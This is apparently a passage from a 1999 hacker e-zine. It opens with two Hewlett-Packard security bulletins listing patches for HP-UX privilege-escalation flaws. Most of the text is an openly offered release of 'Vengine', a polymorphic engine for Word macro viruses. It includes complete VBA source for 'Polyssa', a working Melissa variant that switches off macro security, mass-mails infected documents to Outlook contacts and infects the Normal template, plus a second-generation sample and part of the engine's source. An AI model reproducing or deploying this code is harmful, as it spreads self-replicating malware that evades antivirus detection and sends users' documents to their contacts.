       The documents are listed below.
       -------------------------------------------------------------------------------
       
       Document ID:  HPSBUX9903-096
       Date Loaded:  19990330
             Title:  Security Vulnerability in MC/ServiceGuard & MC/LockManager
       
       -------------------------------------------------------------------------
           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00096, 31 March 1999
       -------------------------------------------------------------------------
       
       The information in the following Security Bulletin should be acted upon
       as soon as possible.  Hewlett-Packard Company will not be liable for any
       consequences to any customer resulting from customer's failure to fully
       implement instructions in this Security Bulletin as soon as possible.
       
       -------------------------------------------------------------------------
       PROBLEM:   MC/ServiceGuard and MC/LockManager exhibit improper
                  implementation of restricted SAM functionality.
       
       PLATFORM:  HP 9000 Series 700/800 Servers running HP-UX 10.X and 11.00
       
       DAMAGE:    Users can gain increased privileges.
       
       SOLUTION:  Apply the patches listed below.
       
       AVAILABILITY:  All patches are available now.
       
       -------------------------------------------------------------------------
       I.
          A. Background
             MC/ServiceGuard and MC/LockManager exhibit improper implementation
             of restricted SAM functionality.
       
          B. Fixing the problem - Install the applicable patch:
       
                  HP-UX
                 Release    Product        Revision       Patch ID
       
                  10.00      MC/SG          A.10.03      PHSS_17478
                  10.01      MC/SG          A.10.03      PHSS_17478
                  10.10      MC/SG MC/LM    A.10.05      PHSS_17479
                  10.20      MC/SG MC/LM    A.10.06      PHSS_17480
                  10.20      MC/SG          A.10.11      PHSS_17580
                  10.20      MC/LM          A.10.07.01   PHSS_17482
       
                  11.00      MC/SG          A.11.05      PHSS_17581
                  11.00      MC/LM          A.11.05      PHSS_17483
                  11.00      MC/LM-J        A.11.05      PHSS_17484
       
       
          C. To subscribe to automatically receive future NEW HP Security
             Bulletins or access the HP Electronic Support Center, use your
             browser to get to our ESC web page at:
       
             http://us-support.external.hp.com   (for non-European locations),
             or  http://europe-support.external.hp.com  (for Europe)
       
             Login with your user ID and password (or register for one).
             Remember to save the User ID/password assigned to you.
       
             Once you are in the Main Menu:
             To -subscribe- to future HP Security Bulletins,
               click on "Support Information Digests".
             To -review Security bulletins already released-,
               click on the "Search Technical Knowledge Database."
             To -retrieve patches-, click on "Individual Patches" and select
               appropriate release and locate with the patch identifier (ID).
             To -browse the HP Security Bulletin Archive-,  select the link at
              the bottom of the page once in the "Support Information Digests".
             To -view the Security Patch Matrix-, (updated daily) which
              categorizes security patches by platform/OS release, and by
              bulletin topic, go to the archive (above) and follow the links.
       
             The security patch matrix is also available via anonymous ftp:
             us-ffs.external.hp.com   or  ~ftp/export/patches/hp-ux_patch_matrix
       
          D. To report new security vulnerabilities, send email to
       
              security-alert@hp.com
       
             Please encrypt any exploit information using the security-alert
             PGP key, available from your local key server, or by sending a
             message with a -subject- (not body) of 'get key' (no quotes) to
             security-alert@hp.com.
       
            Permission is granted for copying and circulating this Bulletin to
            Hewlett-Packard (HP) customers (or the Internet community) for the
            purpose of alerting them to problems, if and only if, the Bulletin
            is not edited or changed in any way, is attributed to HP, and
            provided such reproduction and/or distribution is performed for
            non-commercial purposes.
       
            Any other use of this information is prohibited. HP is not liable
            for any misuse of this information by any third party.
       ________________________________________________________________________
       -----End of Document ID:  HPSBUX9903-096--------------------------------------
       
       Document ID:  HPSBUX9903-095
       Date Loaded:  19990330
             Title:  Security Vulnerability with DESMS
       
       -------------------------------------------------------------------------
           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00095, 31 March 1999
       -------------------------------------------------------------------------
       
       The information in the following Security Bulletin should be acted upon
       as soon as possible.  Hewlett-Packard Company will not be liable for any
       consequences to any customer resulting from customer's failure to fully
       implement instructions in this Security Bulletin as soon as possible.
       
       -------------------------------------------------------------------------
       PROBLEM:   Domain Enterprise Server Management System (DESMS) processes
                  allow increased privileges.
       
       PLATFORM:  HP 9000 Series 7/800 Servers running HP-UX 10.20 and 11.00
       
       DAMAGE:    Users can gain increased privileges.
       
       SOLUTION:  Apply the patches listed below.
       
       AVAILABILITY:  All patches are available now.
       
       -------------------------------------------------------------------------
       I.
          A. Background
             Hewlett-Packard Company HP9000 Series 7/800 servers that run the
             following software packages have extra Domain Management
             background processes running which cause security problems.
       
          B. Fixing the problem
             If you are using one of the products listed below, then install
             the applicable patch for your revision of HP-UX:
       
              For HP-UX release 10.20:   PHNE_17948;
              For HP-UX release 11.00:   PHNE_18017 for product J1593AA only;
              For HP-UX release 11.00:   PHNE_17949 for all other products
                                                    listed below.
       
              Product   Description                        Affected Revision
       
              J1564DA   Netscape Calendar Server                       All
              J1592AA   HP Domain Service Control                      All
              J1593AA   A/R HP Domain Service Control Packaged Edition All
              J3633CA   Netscape/Informix US/Canada                    All
              J3638BA   HP Domain/Netscape Suitespot Pro               All
              J3641DA   Netscape Enterprise Server                     All
              J3651DA   Netscape Collabra Server                       All
              J3655DA   Netscape Message Server                        All
              J3667AA   Netscape Directory Server                      All
              J3675BA   HP Domain/Netscape SuiteSpot (S700)            All
              J3676BA   HP Domain/Netscape SuiteSpot (S800)            All
              J3678AA   Netscape Proxy Server                          All
              J4244AA   Domain Commerce Server                         All
       
             NOTE:  This vulnerability  does not apply to any of the
                    VirtualVault releases.
       
       
       ________________________________________________________________________
       -----End of Document ID:  HPSBUX9903-095--------------------------------------
       

       @HWA 
       
 18.0  VENGINE - creates polymorphic variants of the melissa virus. code included.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       VENGINE - Coded by VeggieTailz, Copyleft 1999
       
       The Vengine, combined with your favorite Microsoft Word macro virus,
       produces a polymorphic version of that virus.  Sorry kiddiez, but you
        will need rudimentary VBA skillz to use this.  Instructions are included
       in the vengine.txt file, and an example is given with the Melissa virus.
       
       I had several motivations for writing this.  One, of course, was to
       demonstrate that WOMEN CAN CODE TOO, a fact often overlooked in today's
       patriarchal society.  Secondly, I was motivated by all the delightful
       publicity provided by the mass media surrounding the Melissa virus.
       Seriously, folks, no one would write viruses if the antivirus community
        didn't give them such limelight for it!  :-)  I also wanted to pedestal
       yet another egregious security hole brought to you by Microsoft.  And,
       lastly, my initial inspiration came from Nick FitzGerald's asinine
       posting to BugTraq, dated 3/29/99, in which he argues that:
       
         "By reformatting the source, you have created a new variant."
       
       Thanks to the Vengine, now every copy of the virus can be a new variant!
       
       
       Files in this archive:
       
       Polyssa.txt  - The Melissa virus modified with the Vengine
       Polyssa2.txt - A 2nd generation of Polyssa
       Vengine.txt  - The Vengine source code and usage directions
       Melissa.txt  - The original Melissa virus
       Readme.txt   - This file
       kiddiez.txt  - STEP-BY-STEP INSTRUCTIONS, FOR THE BRAINDEAD
       
       
       In closing, I would like to give a big pat-on-the-back to the drooling
        masses out there who unwittingly propagate MS-Word macro viruses.  Without
       these people, neither the virus writers nor the antivirus people would
       be in business!  Remember:  When MS-Word asks you if you want to open a
       document because it might contain virus code, JUST SAY NO.  ;->
       
       \/eggieTailz
       
       -=-
       Polyssa.txt
                -=-
                
       ' Polyssa - polymorphic version of Melissa
       '
       ' This code demonstrates how to use the Vengine polymorphizer for MS-Word.
       ' Both the example and the Vengine itself were coded by VeggieTailz.  The
       ' original Melissa code was written by Kwyjibo.
       '
       ' The Vengine concept was inspired by Nick FitzGerald's asinine posting
       ' on BugTraq, dated 3/29/99 and archived at geek-girl.com.  Special
       ' thanks go to Microsoft for their myopic scripting language.
       '
       
       Private Zy7td() As String
       Private QC2cz() As String
       Private K1j() As String
       Private Nv4cl As String
       
       
       Private Sub Document_Open()
         On Error Resume Next
         Randomize: If Rnd > 0.6 Then OldMelissaCode
       End Sub
       
       
       Private Sub Document_Close()
         On Error Resume Next
         Randomize: If Rnd > 0.6 Then OldMelissaCode
       End Sub
       
       
       Private Sub OldMelissaCode()
       ' This is the Melissa code, obtained from www.root.org
       
       If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
         CommandBars("Macro").Controls("Security...").Enabled = False
         System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
       Else
         CommandBars("Tools").Controls("Macro").Enabled = False
         Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
       End If
       
       Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
       Set UngaDasOutlook = CreateObject("Outlook.Application")
       Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
       If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "Kwyjibo" Then
         If UngaDasOutlook = "Outlook" Then
           DasMapiName.Logon "profile", "password"
           For y = 1 To DasMapiName.AddressLists.Count
               Set AddyBook = DasMapiName.AddressLists(y)
               x = 1
               Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
               For oo = 1 To AddyBook.AddressEntries.Count
                   Peep = AddyBook.AddressEntries(x)
                   BreakUmOffASlice.Recipients.Add Peep
                   x = x + 1
                   If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo
       '         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
       '         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                ' Pick something a little more generic:
                BreakUmOffASlice.Subject = "Your mail"
                BreakUmOffASlice.Body = "How's this?" + Chr$(13) + Application.UserName
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = ""
           Next y
           DasMapiName.Logoff
         End If
         System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "Kwyjibo"
       End If
       
       Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
       Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
       NTCL = NTI1.CodeModule.CountOfLines
       ADCL = ADI1.CodeModule.CountOfLines
       BGN = 2
       If ADI1.Name <> "Melissa" Then
         If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
         Set ToInfect = ADI1
         ADI1.Name = "Melissa"
         DoAD = True
       End If
       
       If NTI1.Name <> "Melissa" Then
         If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
         Set ToInfect = NTI1
         NTI1.Name = "Melissa"
         DoNT = True
       End If
           
       If DoNT <> True And DoAD <> True Then GoTo CYA
       
       If DoNT = True Then
       '  Do While ADI1.CodeModule.Lines(1, 1) = ""
       '    ADI1.CodeModule.DeleteLines 1
       '  Loop
       '  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
       '  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
       '    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
       '    BGN = BGN + 1
       '  Loop
         Infect ADI1.CodeModule, ToInfect.CodeModule
       End If
         
       If DoAD = True Then
       '  Do While NTI1.CodeModule.Lines(1, 1) = ""
       '    NTI1.CodeModule.DeleteLines 1
       '  Loop
       '  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
       '  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
       '    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
       '    BGN = BGN + 1
       '  Loop
         Infect NTI1.CodeModule, ToInfect.CodeModule
       End If
       
       CYA:
       
       If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
         ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
       ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
         ActiveDocument.Saved = True
       End If
       
       ' Kudos to original author:
       ' => WORD/Melissa written by Kwyjibo
       ' => Works in both Word 2000 and Word 97
       ' => Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
       ' => Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
       
       ' This must go:
       'If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
       End Sub
       Private Sub InfectTable()
         ' This table stores the identifiers which can be scrambled.  They can
         ' be any ordinary variable name (even names ending with a suffix like
         ' % or $).
         ReDim QC2cz(50)  ' Don't forget to set the array size!
         QC2cz(1) = "Infect"
         QC2cz(2) = "InfectTable"
         QC2cz(3) = "Zy7td"
         QC2cz(4) = "QC2cz"
         QC2cz(5) = "K1j"
         QC2cz(6) = "Nv4cl"
         QC2cz(7) = "Co6q"
         QC2cz(8) = "X3X"
         QC2cz(9) = "R0e"
         QC2cz(10) = "Tq4tl"
         QC2cz(11) = "G4u"
         QC2cz(12) = "To6dm"
         QC2cz(13) = "Rg4mp"
         QC2cz(14) = "I4h"
         QC2cz(15) = "I6w"
         QC2cz(16) = "Gy0u"
         QC2cz(17) = "S5l"
         QC2cz(18) = "T1g"
         QC2cz(19) = "T1b"
         QC2cz(20) = "Ba6Dk%"   ' Note the "%" suffix
         QC2cz(21) = "X1U%"
         QC2cz(22) = "C6E%"
         QC2cz(23) = "C6z%"
         QC2cz(24) = "X6q"
         QC2cz(25) = "XM2wj"
         QC2cz(26) = "Yx1h"
         QC2cz(27) = "Sh6k"
         QC2cz(28) = "T2w"
         QC2cz(29) = "Ky8c"
         
         ' Melissa entries:
         
         QC2cz(30) = "OldMelissaCode"
         QC2cz(31) = "UngaDasOutlook"
         QC2cz(32) = "DasMapiName"
         QC2cz(33) = "BreakUmOffASlice"
         QC2cz(34) = "Melissa?"
         QC2cz(35) = "Kwyjibo"
         QC2cz(36) = "y"
         QC2cz(37) = "x"
         QC2cz(38) = "oo"
         QC2cz(39) = "AddyBook"
         QC2cz(40) = "Peep"
         QC2cz(41) = "ADI1"
         QC2cz(42) = "NTI1"  ' Don't you miss the old DATA statements? :-)
         QC2cz(43) = "NTCL"
         QC2cz(44) = "ADCL"
         QC2cz(45) = "BGN"
         QC2cz(46) = "Melissa"
         QC2cz(47) = "ToInfect"
         QC2cz(48) = "DoAD"
         QC2cz(49) = "DoNT"
         QC2cz(50) = "CYA"
       
         ' EVERYTHING BELOW HERE IS THE VENGINE
       End Sub
       Private Sub Infect(Co6q, X3X)
       ReDim Zy7td(0)
       ReDim QC2cz(0)
       ReDim K1j(0)
       Dim R0e As String
       For I = 1 To Co6q.CountOfLines
       R0e = Co6q.Lines(I, 1)
       If Trim(R0e) <> "" Then T2w R0e, 1
       Next I
       Tq4tl
       X3X.DeleteLines 1, X3X.CountOfLines
       X3X.AddFromString ""
       For I = 1 To Co6q.CountOfLines
       R0e = Co6q.Lines(I, 1)
       If Trim(R0e) <> "" Then
       Nv4cl = ""
       T2w R0e, 2
       If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b"
       X3X.InsertLines X3X.CountOfLines + 1, Nv4cl
       End If
       Next I
       End Sub
       Private Sub Sh6k(To6dm As String, Rg4mp As Integer)
       G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2
       If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2)
       I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z"
       Ky8c = UCase$(Right$(To6dm, 1))
       If Rg4mp = 1 Then
       If I4h Then
       For Ba6Dk% = 1 To UBound(Zy7td)
       If To6dm = Zy7td(Ba6Dk%) Then Exit Sub
       Next Ba6Dk%
       ReDim Preserve Zy7td(UBound(Zy7td) + 1)
       Zy7td(UBound(Zy7td)) = To6dm
       End If
       Exit Sub
       End If
       If I4h Then
       For Ba6Dk% = 1 To UBound(QC2cz)
       If To6dm = QC2cz(Ba6Dk%) Then
       To6dm = K1j(Ba6Dk%)
       If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c
       Exit For
       End If
       Next Ba6Dk%
       End If
       If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34)
       If Nv4cl <> "" Then
       If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm
       End If
       Nv4cl = Nv4cl + To6dm
       End Sub
       Private Sub Tq4tl()
       InfectTable
       ReDim Preserve K1j(UBound(QC2cz))
       For Ba6Dk% = 1 To UBound(K1j)
       I6w:
       Gy0u = Int(Rnd * 3) + 3
       S5l = ""
       For X1U% = 1 To Gy0u
       T1g = Chr$(97 + Int(Rnd * 26))
       If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g)
       If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9)
       S5l = S5l + T1g
       Next X1U%
       For X1U% = 1 To UBound(Zy7td)
       If S5l = Zy7td(X1U%) Then GoTo I6w
       Next X1U%
       For X1U% = 1 To Ba6Dk% - 1
       If S5l = K1j(X1U%) Then GoTo I6w
       Next X1U%
       K1j(Ba6Dk%) = S5l
       Next Ba6Dk%
       End Sub
       Private Sub T2w(R0e As String, Rg4mp As Integer)
       Dim To6dm As String
       Dim T1g As String
       Do
       R0e = LTrim(R0e)
       XM2wj = False
       If Len(R0e) = 0 Then Exit Do
       C6E% = 1
       T1g = UCase$(Left$(R0e, 1))
       X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9")
       Do
       If C6E% > Len(R0e) Then Exit Do
       T1g = Mid$(R0e, C6E%, 1)
       If T1g = Chr$(34) Then
       If XM2wj Then C6E% = C6E% + 1: Exit Do
       XM2wj = True
       End If
       If Not XM2wj Then
       If X6q Then
       If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do
       If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do
       End If
       Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z"
       Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_"
       If X6q <> Yx1h Then Exit Do
       If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do
       End If
       C6E% = C6E% + 1
       Loop
       To6dm = Left$(R0e, C6E% - 1)
       R0e = Right$(R0e, Len(R0e) - (C6E% - 1))
       If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do
       Sh6k To6dm, Rg4mp
       Loop
       End Sub
       
         
       
       -=-
       Polyssa2.txt
                -=-
       
        ' This file contains example 2nd generation output from Polyssa
       
        ' T1b
       
       
       
       
       
        ' T1b
        ' T1b
       
       
       Private NM9D() As String
       Private Jk4tn() As String
       Private XL2o() As String
       Private To6i As String
       
       Private Sub Document_Open()
         On Error Resume Next
         Randomize: If Rnd > 0.6 Then Lm2jv
       End Sub
       
       
       Private Sub Document_Close()
         On Error Resume Next
         Randomize: If Rnd > 0.6 Then Lm2jv
       End Sub
       
       Private Sub Lm2jv()
       
       If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
       CommandBars("Macro").Controls("Security...").Enabled = False
       System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
       Else
       CommandBars("Tools").Controls("Macro").Enabled = False     ' T1b
       Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
       End If
       Dim Rm4gU, K0t, Xy9ti   ' T1b
       Set Rm4gU = CreateObject("Outlook.Application")
       Set K0t = Rm4gU.GetNameSpace("MAPI")   ' T1b
       If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") <> "Gp5Xr" Then
       If Rm4gU = "Outlook" Then
       K0t.Logon "profile", "password"
       For D7R = 1 To K0t.AddressLists.Count
       Set Qt3tq = K0t.AddressLists(D7R)    ' T1b
       Au1R = 1
       Set Xy9ti = Rm4gU.CreateItem(0)
       For T6e = 1 To Qt3tq.AddressEntries.Count
       J2P = Qt3tq.AddressEntries(Au1R)
       Xy9ti.Recipients.Add J2P
       Au1R = Au1R + 1
       If Au1R > 50 Then T6e = Qt3tq.AddressEntries.Count
       Next T6e
       
       
       
       Xy9ti.Subject = "Your mail"
       Xy9ti.Body = "How's this?" + Chr$(13) + Application.UserName
       Xy9ti.Attachments.Add ActiveDocument.FullName
       Xy9ti.Send
       J2P = ""
       Next D7R
       K0t.Logoff
       End If
       System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") = "Gp5Xr"
       End If
       Set Td7x1 = ActiveDocument.VBProject.VBComponents.Item(1)
       Set RV8Q1 = NormalTemplate.VBProject.VBComponents.Item(1)    ' T1b
       D1d = RV8Q1.CodeModule.CountOfLines
       B6r = Td7x1.CodeModule.CountOfLines
       Qz3c = 2
       If Td7x1.Name <> "Fg2c" Then
       If B6r > 0 Then Td7x1.CodeModule.DeleteLines 1, B6r
       Set Ih0M = Td7x1
       Td7x1.Name = "Fg2c"
       Wn2zR = True
       End If
       If RV8Q1.Name <> "Fg2c" Then
       If D1d > 0 Then RV8Q1.CodeModule.DeleteLines 1, D1d
       Set Ih0M = RV8Q1
       RV8Q1.Name = "Fg2c"
       Gj5y = True
       End If ' T1b
       If Gj5y <> True And Wn2zR <> True Then GoTo Yt9qC
       If Gj5y = True Then
       
       
       
       
       
       
       
       
       Wc4vu Td7x1.CodeModule, Ih0M.CodeModule
       End If
       If Wn2zR = True Then
        ' T1b
       
       
       
       
        ' T1b
       
       
       Wc4vu RV8Q1.CodeModule, Ih0M.CodeModule
       End If
       Yt9qC:  ' T1b
       If D1d <> 0 And B6r = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then        ' T1b
       ActiveDocument.SaveAs FileName:=ActiveDocument.FullName   ' T1b
       ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
       ActiveDocument.Saved = True ' T1b
       End If
        ' T1b
       
       
       
       
       
       
       End Sub
       Private Sub P5R()
        ' T1b
       
       
       ReDim Jk4tn(50)
       Jk4tn(1) = "Wc4vu"
       Jk4tn(2) = "P5R"
       Jk4tn(3) = "NM9D"
       Jk4tn(4) = "Jk4tn"
       Jk4tn(5) = "XL2o"    ' T1b
       Jk4tn(6) = "To6i"    ' T1b
       Jk4tn(7) = "ID2Ki"
       Jk4tn(8) = "H2f"
       Jk4tn(9) = "Q6d"
       Jk4tn(10) = "E7m"
       Jk4tn(11) = "Ze6Fm"
       Jk4tn(12) = "Ve7Fv"
       Jk4tn(13) = "C5m"
       Jk4tn(14) = "Ac4G"    ' T1b
       Jk4tn(15) = "L1G"
       Jk4tn(16) = "F6P"
       Jk4tn(17) = "Qz9yi"
       Jk4tn(18) = "CI1j"
       Jk4tn(19) = "Qg1sh"
       Jk4tn(20) = "X3J%"
       Jk4tn(21) = "Vs1fb%"    ' T1b
       Jk4tn(22) = "S4u%"
       Jk4tn(23) = "Jo5n%"
       Jk4tn(24) = "I6b"
       Jk4tn(25) = "Zo4ni"
       Jk4tn(26) = "Vc4b"
       Jk4tn(27) = "Ov1dd"
       Jk4tn(28) = "L5Z"    ' T1b
       Jk4tn(29) = "Lq5a"
       
       Jk4tn(30) = "Lm2jv"
       Jk4tn(31) = "Rm4gU"
       Jk4tn(32) = "K0t"
       Jk4tn(33) = "Xy9ti"
       Jk4tn(34) = "C1x?"
       Jk4tn(35) = "Gp5Xr"
       Jk4tn(36) = "D7R"
       Jk4tn(37) = "Au1R"
       Jk4tn(38) = "T6e"
       Jk4tn(39) = "Qt3tq"
       Jk4tn(40) = "J2P"
       Jk4tn(41) = "Td7x1"
       Jk4tn(42) = "RV8Q1"
       Jk4tn(43) = "D1d"
       Jk4tn(44) = "B6r"
       Jk4tn(45) = "Qz3c"
       Jk4tn(46) = "Fg2c"
       Jk4tn(47) = "Ih0M"    ' T1b
       Jk4tn(48) = "Wn2zR"
       Jk4tn(49) = "Gj5y"
       Jk4tn(50) = "Yt9qC"
       
       End Sub
       Private Sub Wc4vu(ID2Ki, H2f)
       ReDim NM9D(0)
       ReDim Jk4tn(0)
       ReDim XL2o(0)
       Dim Q6d As String
       For I = 1 To ID2Ki.CountOfLines
       Q6d = ID2Ki.Lines(I, 1)
       If Trim(Q6d) <> "" Then L5Z Q6d, 1
       Next I
       E7m
       H2f.DeleteLines 1, H2f.CountOfLines
       H2f.AddFromString ""
       For I = 1 To ID2Ki.CountOfLines
       Q6d = ID2Ki.Lines(I, 1)
       If Trim(Q6d) <> "" Then
       To6i = ""
       L5Z Q6d, 2
       If Rnd < 0.1 Then To6i = To6i + " ' " + "Qg1sh"
       H2f.InsertLines H2f.CountOfLines + 1, To6i
       End If
       Next I
       End Sub
       Private Sub Ov1dd(Ve7Fv As String, C5m As Integer)
       Ze6Fm = Left$(Ve7Fv, 1) = Chr$(34) And Right$(Ve7Fv, 1) = Chr$(34) And Len(Ve7Fv) > 2                  ' T1b
       If Ze6Fm Then Ve7Fv = Mid$(Ve7Fv, 2, Len(Ve7Fv) - 2)
       Ac4G = UCase$(Left$(Ve7Fv, 1)) >= "A" And UCase$(Left$(Ve7Fv, 1)) <= "Z"
       Lq5a = UCase$(Right$(Ve7Fv, 1))
       If C5m = 1 Then
       If Ac4G Then
       For X3J% = 1 To UBound(NM9D)
       If Ve7Fv = NM9D(X3J%) Then Exit Sub
       Next X3J%
       ReDim Preserve NM9D(UBound(NM9D) + 1)
       NM9D(UBound(NM9D)) = Ve7Fv
       End If
       Exit Sub
       End If
       If Ac4G Then
       For X3J% = 1 To UBound(Jk4tn)
       If Ve7Fv = Jk4tn(X3J%) Then
       Ve7Fv = XL2o(X3J%)
       If Lq5a < "A" Or Lq5a > "Z" Then Ve7Fv = Ve7Fv + Lq5a
       Exit For
       End If ' T1b
       Next X3J%
       End If
       If Ze6Fm Then Ve7Fv = Chr$(34) + Ve7Fv + Chr$(34)
       If To6i <> "" Then
       If Right$(To6i, 1) <> "." And Left$(Ve7Fv, 1) <> "." Then Ve7Fv = " " + Ve7Fv         ' T1b
       End If
       To6i = To6i + Ve7Fv
       End Sub
       Private Sub E7m()
       P5R
       ReDim Preserve XL2o(UBound(Jk4tn))
       For X3J% = 1 To UBound(XL2o)
       L1G:
       F6p = Int(Rnd * 3) + 3
       Qz9yi = ""
       For Vs1fb% = 1 To F6p
       CI1j = Chr$(97 + Int(Rnd * 26))
       If Vs1fb% = 1 Or Rnd > 0.8 Then CI1j = UCase$(CI1j)    ' T1b
       If Vs1fb% = 1 + Int(F6p / 2) Then CI1j = Chr$(48 + Rnd * 9)
       Qz9yi = Qz9yi + CI1j
       Next Vs1fb%
       For Vs1fb% = 1 To UBound(NM9D)
       If Qz9yi = NM9D(Vs1fb%) Then GoTo L1G
       Next Vs1fb%
       For Vs1fb% = 1 To X3J% - 1
       If Qz9yi = XL2o(Vs1fb%) Then GoTo L1G
       Next Vs1fb%
       XL2o(X3J%) = Qz9yi
       Next X3J%
       End Sub
       Private Sub L5Z(Q6d As String, C5m As Integer)
       Dim Ve7Fv As String
       Dim CI1j As String ' T1b
       Do
       Q6d = LTrim(Q6d)
       Zo4ni = False
       If Len(Q6d) = 0 Then Exit Do
       S4u% = 1
       CI1j = UCase$(Left$(Q6d, 1))
       I6b = (CI1j >= "A" And CI1j <= "Z") Or (CI1j >= "0" And CI1j <= "9")
       Do
       If S4u% > Len(Q6d) Then Exit Do
       CI1j = Mid$(Q6d, S4u%, 1)
       If CI1j = Chr$(34) Then
       If Zo4ni Then S4u% = S4u% + 1: Exit Do
       Zo4ni = True ' T1b
       End If
       If Not Zo4ni Then
       If I6b Then
       If CI1j = "$" Or CI1j = "%" Or CI1j = "&" Then S4u% = S4u% + 1: Exit Do
       If CI1j = "!" Or CI1j = "#" Then S4u% = S4u% + 1: Exit Do
       End If
       Vc4b = UCase$(CI1j) >= "A" And UCase$(CI1j) <= "Z"       ' T1b
       Vc4b = Vc4b Or (CI1j >= "0" And CI1j <= "9") Or CI1j = "_"
       If I6b <> Vc4b Then Exit Do
       If CI1j < Chr$(33) Or CI1j > Chr$(127) Then Exit Do
       End If
       S4u% = S4u% + 1
       Loop
       Ve7Fv = Left$(Q6d, S4u% - 1)
       Q6d = Right$(Q6d, Len(Q6d) - (S4u% - 1))
       If Left$(Ve7Fv, 1) = "'" Or Ve7Fv = "Rem" Then Exit Do
       Ov1dd Ve7Fv, C5m
       Loop
       End Sub
       

       
       
       -=-
       Vengine.txt
                -=-
                
       ' Vengine - polymorphizer for MS-Word macro viruses
       ' Coded by VeggieTailz
       '
       ' This engine can be used to polymorphize any MS-Word macro virus.
       '
       ' The Vengine concept was inspired by Nick FitzGerald's asinine posting
       ' on BugTraq, dated 3/29/99 and archived at geek-girl.com.
       '
       Private Zy7td() As String
       Private QC2cz() As String
       Private K1j() As String
       Private Nv4cl As String
       Private Sub Example()
         ' As a demo, we'll copy the current macros to the template.  After running
         ' this example (make sure this is the ActiveDocument!), examine the MS-Word
         ' template.  It will contain a scrambled (but still functional) version of
         ' this program.
         Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
         Set Dest = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
         
         ' The "Infect" sub copies the macros from "Source" to "Dest", scrambling
         ' them in the process.  The contents of Dest are overwritten.
         Infect Source, Dest
       End Sub
       Private Sub InfectTable()
         ' This table stores the identifiers which will be scrambled.  They can
         ' be any ordinary variable name (even names ending with a suffix like
         ' % or $).  Make your choices carefully tho, as the substitutions
         ' will also be applied to string constants (otherwise the code below
         ' would not get updated).
         ReDim QC2cz(29)  ' don't forget to set the array size!
         QC2cz(1) = "Infect"
         QC2cz(2) = "InfectTable"
         QC2cz(3) = "Zy7td"
         QC2cz(4) = "QC2cz"
         QC2cz(5) = "K1j"
         QC2cz(6) = "Nv4cl"
         QC2cz(7) = "Co6q"
         QC2cz(8) = "X3X"
         QC2cz(9) = "R0e"
         QC2cz(10) = "Tq4tl"
         QC2cz(11) = "G4u"
